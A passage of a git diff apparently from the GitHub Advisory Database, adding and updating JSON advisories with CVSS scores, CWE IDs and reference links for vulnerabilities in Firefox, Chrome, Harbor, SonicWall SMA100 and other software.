"https://www.usom.gov.tr/bildirim/tr-25-0171" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h5wm-mmc5-5pvc/GHSA-h5wm-mmc5-5pvc.json b/advisories/unreviewed/2025/07/GHSA-h5wm-mmc5-5pvc/GHSA-h5wm-mmc5-5pvc.json index 4ec4ca6e49ffb..0102b8d12e669 100644 --- a/advisories/unreviewed/2025/07/GHSA-h5wm-mmc5-5pvc/GHSA-h5wm-mmc5-5pvc.json +++ b/advisories/unreviewed/2025/07/GHSA-h5wm-mmc5-5pvc/GHSA-h5wm-mmc5-5pvc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h5wm-mmc5-5pvc", - "modified": "2025-07-23T00:30:32Z", + "modified": "2025-07-23T15:31:13Z", "published": "2025-07-23T00:30:32Z", "aliases": [ "CVE-2025-8011" ], "details": "Type Confusion in V8 in Google Chrome prior to 138.0.7204.168 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -27,7 +32,7 @@ "cwe_ids": [ "CWE-843" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T22:15:39Z" diff --git a/advisories/unreviewed/2025/07/GHSA-hrgv-4496-v5w7/GHSA-hrgv-4496-v5w7.json b/advisories/unreviewed/2025/07/GHSA-hrgv-4496-v5w7/GHSA-hrgv-4496-v5w7.json new file mode 100644 index 0000000000000..eeb9052802a36 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hrgv-4496-v5w7/GHSA-hrgv-4496-v5w7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hrgv-4496-v5w7", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2025-36117" + ], + "details": "IBM Db2 Mirror for i 7.4, 7.5, and 7.6 does not disallow the session id after use which could allow an authenticated user to impersonate another user on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36117" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7240351" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hxr8-chw2-2wqc/GHSA-hxr8-chw2-2wqc.json b/advisories/unreviewed/2025/07/GHSA-hxr8-chw2-2wqc/GHSA-hxr8-chw2-2wqc.json index 4c984cd7d3232..28f16cf45875c 100644 --- a/advisories/unreviewed/2025/07/GHSA-hxr8-chw2-2wqc/GHSA-hxr8-chw2-2wqc.json +++ b/advisories/unreviewed/2025/07/GHSA-hxr8-chw2-2wqc/GHSA-hxr8-chw2-2wqc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hxr8-chw2-2wqc", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:11Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8032" ], "details": "XSLT document loading did not correctly propagate the source document which bypassed its CSP. This vulnerability affects Firefox < 141, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -44,8 +49,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-693" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-j3rx-39f7-r8hw/GHSA-j3rx-39f7-r8hw.json b/advisories/unreviewed/2025/07/GHSA-j3rx-39f7-r8hw/GHSA-j3rx-39f7-r8hw.json index a4ccc34fe09d3..3c4bbdf49e4c7 100644 --- a/advisories/unreviewed/2025/07/GHSA-j3rx-39f7-r8hw/GHSA-j3rx-39f7-r8hw.json +++ b/advisories/unreviewed/2025/07/GHSA-j3rx-39f7-r8hw/GHSA-j3rx-39f7-r8hw.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j3rx-39f7-r8hw", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:10Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8027" ], "details": "On 64-bit platforms IonMonkey-JIT only wrote 32 bits of the 64-bit return value space on the stack. Baseline-JIT, however, read the entire 64 bits. This vulnerability affects Firefox < 141, Firefox ESR < 115.26, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-457" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:49Z" diff --git a/advisories/unreviewed/2025/07/GHSA-j6gx-vvh5-9mwh/GHSA-j6gx-vvh5-9mwh.json b/advisories/unreviewed/2025/07/GHSA-j6gx-vvh5-9mwh/GHSA-j6gx-vvh5-9mwh.json index 863bd6d5903c2..906baaf8b6abb 100644 --- a/advisories/unreviewed/2025/07/GHSA-j6gx-vvh5-9mwh/GHSA-j6gx-vvh5-9mwh.json +++ b/advisories/unreviewed/2025/07/GHSA-j6gx-vvh5-9mwh/GHSA-j6gx-vvh5-9mwh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j6gx-vvh5-9mwh", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:11Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8033" ], "details": "The JavaScript engine did not handle closed generators correctly and it was possible to resume them leading to a nullptr deref. This vulnerability affects Firefox < 141, Firefox ESR < 115.26, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-m4x7-38rv-hjmc/GHSA-m4x7-38rv-hjmc.json b/advisories/unreviewed/2025/07/GHSA-m4x7-38rv-hjmc/GHSA-m4x7-38rv-hjmc.json index 4dccac369c3f3..ae4d60705994e 100644 --- a/advisories/unreviewed/2025/07/GHSA-m4x7-38rv-hjmc/GHSA-m4x7-38rv-hjmc.json +++ b/advisories/unreviewed/2025/07/GHSA-m4x7-38rv-hjmc/GHSA-m4x7-38rv-hjmc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m4x7-38rv-hjmc", - "modified": "2025-07-23T06:33:52Z", + "modified": "2025-07-23T15:31:13Z", "published": "2025-07-23T06:33:52Z", "aliases": [ "CVE-2025-6174" ], "details": "The Qwizcards | online quizzes and flashcards WordPress plugin through 3.9.4 does not sanitise and escape the \"_stylesheet\" parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or any other user.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-23T06:15:28Z" diff --git a/advisories/unreviewed/2025/07/GHSA-mmhg-phmp-2p2v/GHSA-mmhg-phmp-2p2v.json b/advisories/unreviewed/2025/07/GHSA-mmhg-phmp-2p2v/GHSA-mmhg-phmp-2p2v.json new file mode 100644 index 0000000000000..e86100f83db68 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mmhg-phmp-2p2v/GHSA-mmhg-phmp-2p2v.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmhg-phmp-2p2v", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2010-10012" + ], + "details": "A path traversal vulnerability exists in httpdasm version 0.92, a lightweight Windows HTTP server, that allows unauthenticated attackers to read arbitrary files on the host system. By sending a specially crafted GET request containing a sequence of URL-encoded backslashes and directory traversal patterns, an attacker can escape the web root and access sensitive files outside of the intended directory.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-10012" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/15861" + }, + { + "type": "WEB", + "url": "https://www.japheth.de/httpdASM.html" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/httpasm-path-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mxm4-f7vp-h4q7/GHSA-mxm4-f7vp-h4q7.json b/advisories/unreviewed/2025/07/GHSA-mxm4-f7vp-h4q7/GHSA-mxm4-f7vp-h4q7.json new file mode 100644 index 0000000000000..2ffce800fbf02 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mxm4-f7vp-h4q7/GHSA-mxm4-f7vp-h4q7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mxm4-f7vp-h4q7", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2016-15045" + ], + "details": "A local privilege escalation vulnerability exists in lastore-daemon, the system package manager daemon used in Deepin Linux (developed by Wuhan Deepin Technology Co., Ltd.). In versions 0.9.53-1 (Deepin 15.5) and 0.9.66-1 (Deepin 15.7), the D-Bus configuration permits any user in the sudo group to invoke the InstallPackage method without password authentication. By default, the first user created on Deepin is in the sudo group. An attacker with shell access can craft a .deb package containing a malicious post-install script and use dbus-send to install it via lastore-daemon, resulting in arbitrary code execution as root.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-15045" + }, + { + "type": "WEB", + "url": "https://github.com/linuxdeepin/lastore-daemon" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb" + }, + { + "type": "WEB", + "url": "https://www.deepin.org/en/mirrors/releases" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/39433" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/44523" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/deepin-lastore-daemon-priv-esc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q32c-9wc5-gv77/GHSA-q32c-9wc5-gv77.json b/advisories/unreviewed/2025/07/GHSA-q32c-9wc5-gv77/GHSA-q32c-9wc5-gv77.json index 0763762ff7079..eb04a4abfe859 100644 --- a/advisories/unreviewed/2025/07/GHSA-q32c-9wc5-gv77/GHSA-q32c-9wc5-gv77.json +++ b/advisories/unreviewed/2025/07/GHSA-q32c-9wc5-gv77/GHSA-q32c-9wc5-gv77.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q32c-9wc5-gv77", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:10Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8031" ], "details": "The `username:password` part was not correctly stripped from URLs in CSP reports potentially leaking HTTP Basic Authentication credentials. This vulnerability affects Firefox < 141, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -44,8 +49,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-276" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-rc69-9q59-4f5f/GHSA-rc69-9q59-4f5f.json b/advisories/unreviewed/2025/07/GHSA-rc69-9q59-4f5f/GHSA-rc69-9q59-4f5f.json index 64d4679872521..5b33cd17c5815 100644 --- a/advisories/unreviewed/2025/07/GHSA-rc69-9q59-4f5f/GHSA-rc69-9q59-4f5f.json +++ b/advisories/unreviewed/2025/07/GHSA-rc69-9q59-4f5f/GHSA-rc69-9q59-4f5f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rc69-9q59-4f5f", - "modified": "2025-07-23T00:30:32Z", + "modified": "2025-07-23T15:31:13Z", "published": "2025-07-23T00:30:32Z", "aliases": [ "CVE-2025-8010" ], "details": "Type Confusion in V8 in Google Chrome prior to 138.0.7204.168 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -27,7 +32,7 @@ "cwe_ids": [ "CWE-843" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T22:15:38Z" diff --git a/advisories/unreviewed/2025/07/GHSA-v874-5h23-p793/GHSA-v874-5h23-p793.json b/advisories/unreviewed/2025/07/GHSA-v874-5h23-p793/GHSA-v874-5h23-p793.json index c7f1af4d28bc3..30d95b68800ea 100644 --- a/advisories/unreviewed/2025/07/GHSA-v874-5h23-p793/GHSA-v874-5h23-p793.json +++ b/advisories/unreviewed/2025/07/GHSA-v874-5h23-p793/GHSA-v874-5h23-p793.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v874-5h23-p793", - "modified": "2025-07-22T21:31:15Z", + "modified": "2025-07-23T15:31:11Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8034" ], "details": "Memory safety bugs present in Firefox ESR 115.25, Firefox ESR 128.12, Thunderbird ESR 128.12, Firefox ESR 140.0, Thunderbird ESR 140.0, Firefox 140 and Thunderbird 140. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 141, Firefox ESR < 115.26, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-v8p8-2685-3cvr/GHSA-v8p8-2685-3cvr.json b/advisories/unreviewed/2025/07/GHSA-v8p8-2685-3cvr/GHSA-v8p8-2685-3cvr.json new file mode 100644 index 0000000000000..2e7b5ca374915 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v8p8-2685-3cvr/GHSA-v8p8-2685-3cvr.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8p8-2685-3cvr", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2022-4978" + ], + "details": "Remote Control Server, maintained by Steppschuh, 3.1.1.12 allows unauthenticated remote code execution when authentication is disabled, which is the default configuration. The server exposes a custom UDP-based control protocol that accepts remote keyboard input events without verification. An attacker on the same network can issue a sequence of keystroke commands to launch a system shell and execute arbitrary commands, resulting in full system compromise.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4978" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/misc/remote_control_collection_rce.rb" + }, + { + "type": "WEB", + "url": "https://remote-control-collection.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/steppschuh-remote-control-server-unauth-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wjrh-49mw-5943/GHSA-wjrh-49mw-5943.json b/advisories/unreviewed/2025/07/GHSA-wjrh-49mw-5943/GHSA-wjrh-49mw-5943.json new file mode 100644 index 0000000000000..fb7f6bc71b778 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wjrh-49mw-5943/GHSA-wjrh-49mw-5943.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjrh-49mw-5943", + "modified": "2025-07-23T15:31:14Z", + "published": "2025-07-23T15:31:14Z", + "aliases": [ + "CVE-2025-40597" + ], + "details": "A Heap-based buffer overflow vulnerability in the SMA100 series web interface allows remote, unauthenticated attacker to cause Denial of Service (DoS) or potentially results in code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40597" + }, + { + "type": "WEB", + "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0012" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-x64w-w449-jx7q/GHSA-x64w-w449-jx7q.json b/advisories/unreviewed/2025/07/GHSA-x64w-w449-jx7q/GHSA-x64w-w449-jx7q.json new file mode 100644 index 0000000000000..9c6a6a818d725 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-x64w-w449-jx7q/GHSA-x64w-w449-jx7q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x64w-w449-jx7q", + "modified": "2025-07-23T15:31:14Z", + "published": "2025-07-23T15:31:14Z", + "aliases": [ + "CVE-2025-40598" + ], + "details": "A Reflected cross-site scripting (XSS) vulnerability exists in the SMA100 series web interface, allowing a remote unauthenticated attacker to potentially execute arbitrary JavaScript code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40598" + }, + { + "type": "WEB", + "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0012" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T15:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-x6gw-c4hj-p3rx/GHSA-x6gw-c4hj-p3rx.json b/advisories/unreviewed/2025/07/GHSA-x6gw-c4hj-p3rx/GHSA-x6gw-c4hj-p3rx.json index 4916170a31971..a43bbcb3190bc 100644 --- a/advisories/unreviewed/2025/07/GHSA-x6gw-c4hj-p3rx/GHSA-x6gw-c4hj-p3rx.json +++ b/advisories/unreviewed/2025/07/GHSA-x6gw-c4hj-p3rx/GHSA-x6gw-c4hj-p3rx.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x6gw-c4hj-p3rx", - "modified": "2025-07-22T15:32:52Z", + "modified": "2025-07-23T15:31:09Z", "published": "2025-07-22T15:32:52Z", "aliases": [ "CVE-2025-51867" ], "details": "Insecure Direct Object Reference (IDOR) vulnerability in Deepfiction AI (deepfiction.ai) thru June 3, 2025, allowing attackers to chat with the LLM using other users' credits via sensitive information gained by the /browse/stories endpoint.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T14:15:36Z" From 73e277c072e82375748b6260cd689e58ecd492f1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 15:49:29 +0000 Subject: [PATCH 118/323] Publish GHSA-h27m-3qw8-3pw8 --- .../GHSA-h27m-3qw8-3pw8.json | 102 ++++++++++++++++++ 1 file changed, 102 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-h27m-3qw8-3pw8/GHSA-h27m-3qw8-3pw8.json diff --git a/advisories/github-reviewed/2025/07/GHSA-h27m-3qw8-3pw8/GHSA-h27m-3qw8-3pw8.json b/advisories/github-reviewed/2025/07/GHSA-h27m-3qw8-3pw8/GHSA-h27m-3qw8-3pw8.json new file mode 100644 index 0000000000000..c7ff677550876 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-h27m-3qw8-3pw8/GHSA-h27m-3qw8-3pw8.json @@ -0,0 +1,102 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h27m-3qw8-3pw8", + "modified": "2025-07-23T15:47:31Z", + "published": "2025-07-23T15:47:31Z", + "aliases": [ + "CVE-2025-30086" + ], + "summary": "Possible ORM Leak Vulnerability in the Harbor", + "details": "### Impact\n\nAdministrator users on Harbor could exploit an ORM Leak (https://www.elttam.com/blog/plormbing-your-django-orm/) vulnerability that was present in the `/api/v2.0/users` endpoint to leak users' password hash and salt values. This vulnerability was introduced into the application because the `q` URL parameter allowed the administrator to filter users by any column, and the filter `password=~` could be abused to leak out a user's password hash character by character.\n\nAn attacker with administrator access could exploit this vulnerability to leak highly sensitive information stored on the Harbor database, as demonstrated in the attached writeup by the leaking of users' password hashes and salts. All endpoints that support the `q` URL parameter are vulnerable to this ORM leak attack, and could potentially be exploitable by lower privileged users to gain unauthorised access to other sensitive information. \n\n\n### Patches\nNo available\n\n### Workarounds\nNA\n\n### References\n\n### Credit\nalex@elttam.com", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/goharbor/harbor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.13.0" + }, + { + "fixed": "2.13.1" + } + ] + } + ], + "versions": [ + "2.13.0" + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/goharbor/harbor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0-rc1.1" + }, + { + "fixed": "2.12.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/goharbor/harbor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.4.0-rc1.0.20250331071157-dce7d9f5cffb" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/goharbor/harbor/security/advisories/GHSA-h27m-3qw8-3pw8" + }, + { + "type": "WEB", + "url": "https://github.com/goharbor/harbor/commit/dce7d9f5cffbd0d0c5d27e7a2f816f65a930702c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/goharbor/harbor" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-202" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T15:47:31Z", + "nvd_published_at": null + } +} \ No newline at end of file From 707ca370c7dc60913172c2305808238199db008c Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 16:03:51 +0000 Subject: [PATCH 119/323] Publish GHSA-9h3q-32c7-r533 --- .../GHSA-9h3q-32c7-r533.json | 35 ++++++++++++++++--- 1 file changed, 30 insertions(+), 5 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-9h3q-32c7-r533/GHSA-9h3q-32c7-r533.json (63%) diff --git a/advisories/unreviewed/2025/07/GHSA-9h3q-32c7-r533/GHSA-9h3q-32c7-r533.json b/advisories/github-reviewed/2025/07/GHSA-9h3q-32c7-r533/GHSA-9h3q-32c7-r533.json similarity index 63% rename from advisories/unreviewed/2025/07/GHSA-9h3q-32c7-r533/GHSA-9h3q-32c7-r533.json rename to advisories/github-reviewed/2025/07/GHSA-9h3q-32c7-r533/GHSA-9h3q-32c7-r533.json index f15f8d69a6124..00a77b8ed1178 100644 --- a/advisories/unreviewed/2025/07/GHSA-9h3q-32c7-r533/GHSA-9h3q-32c7-r533.json +++ b/advisories/github-reviewed/2025/07/GHSA-9h3q-32c7-r533/GHSA-9h3q-32c7-r533.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-9h3q-32c7-r533", - "modified": "2025-07-23T06:33:50Z", + "modified": "2025-07-23T16:01:50Z", "published": "2025-07-23T06:33:50Z", "aliases": [ "CVE-2025-8020" ], + "summary": "private-ip vulnerable to Server-Side Request Forgery", "details": "All versions of the package private-ip are vulnerable to Server-Side Request Forgery (SSRF) where an attacker can provide an IP or hostname that resolves to a multicast IP address (224.0.0.0/4) which is not included as part of the private IP ranges in the package's source code.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "private-ip" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": 